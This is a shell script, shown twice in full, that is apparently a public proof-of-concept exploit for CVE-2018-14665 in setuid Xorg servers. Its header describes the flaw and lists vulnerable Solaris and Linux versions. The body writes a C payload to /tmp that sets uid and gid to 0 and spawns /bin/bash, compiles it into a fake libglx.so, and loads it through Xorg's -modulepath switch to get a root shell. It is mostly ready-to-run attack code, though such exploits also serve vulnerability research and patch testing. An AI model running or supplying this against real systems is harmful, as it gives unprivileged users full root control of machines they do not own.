raptor_xorgy

#!/bin/sh

#
# raptor_xorgy - xorg-x11-server LPE via modulepath switch
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit variant triggers the bug in the -modulepath command line switch
# to load a malicious X11 module in order to escalate privileges to root on
# vulnerable systems. This technique is less invasive than exploiting the
# -logfile switch, however the gcc compiler must be present in order for it to
# work out of the box. Alternatively, you must use a pre-compiled malicious .so
# compatible with the target system and modify the exploit accordingly.
#
# It works very reliably on Solaris 11.4 and should work on most vulnerable
# Linux distributions (though I haven't tested it). It fails on OpenBSD due to
# their Xorg privilege separation (Xenocara). On this platform you should use
# raptor_xorgasm instead.
#
# Thanks to @alanc and @nushinde for discussing this alternative vector.
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm
# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html
# https://nvd.nist.gov/vuln/detail/CVE-2006-0745
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xorgy
# raptor@stalker:~$ ./raptor_xorgy
# [...]
# root@stalker:~# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
# CentOS Linux 7 [untested]
# Red Hat Enterprise Linux 7 [untested]
# Ubuntu Linux 18.10 [untested]
# Ubuntu Linux 18.04 LTS [untested]
# Ubuntu Linux 16.04 LTS [untested]
# Debian GNU/Linux 9 [untested]
# [...]
#

echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the payload
cat << EOF > /tmp/pwned.c
_init()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
EOF
# libglx.so should be a good target, refer to Xorg logs for other candidates
gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so
if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi

# trigger the bug
echo "Got root?"
Xorg -modulepath ",/tmp" :1
	#!/bin/sh

	#
	# raptor_xorgy - xorg-x11-server LPE via modulepath switch
	# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
	#
	# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
	# check for -modulepath and -logfile options when starting Xorg. X server
	# allows unprivileged users with the ability to log in to the system via
	# physical console to escalate their privileges and run arbitrary code under
	# root privileges (CVE-2018-14665).
	#
	# This exploit variant triggers the bug in the -modulepath command line switch
	# to load a malicious X11 module in order to escalate privileges to root on
	# vulnerable systems. This technique is less invasive than exploiting the
	# -logfile switch, however the gcc compiler must be present in order for it to
	# work out of the box. Alternatively, you must use a pre-compiled malicious .so
	# compatible with the target system and modify the exploit accordingly.
	#
	# It works very reliably on Solaris 11.4 and should work on most vulnerable
	# Linux distributions (though I haven't tested it). It fails on OpenBSD due to
	# their Xorg privilege separation (Xenocara). On this platform you should use
	# raptor_xorgasm instead.
	#
	# Thanks to @alanc and @nushinde for discussing this alternative vector.
	#
	# See also:
	# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
	# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm
	# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html
	# https://nvd.nist.gov/vuln/detail/CVE-2006-0745
	#
	# Usage:
	# raptor@stalker:~$ chmod +x raptor_xorgy
	# raptor@stalker:~$ ./raptor_xorgy
	# [...]
	# root@stalker:~# id
	# uid=0(root) gid=0(root)
	#
	# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
	# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
	# Oracle Solaris 11 SPARC [untested]
	# CentOS Linux 7 [untested]
	# Red Hat Enterprise Linux 7 [untested]
	# Ubuntu Linux 18.10 [untested]
	# Ubuntu Linux 18.04 LTS [untested]
	# Ubuntu Linux 16.04 LTS [untested]
	# Debian GNU/Linux 9 [untested]
	# [...]
	#

	echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"
	echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
	echo

	# prepare the payload
	cat << EOF > /tmp/pwned.c
	_init()
	{
	setuid(0);
	setgid(0);
	system("/bin/bash");
	}
	EOF
	# libglx.so should be a good target, refer to Xorg logs for other candidates
	gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so
	if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi

	# trigger the bug
	echo "Got root?"
	Xorg -modulepath ",/tmp" :1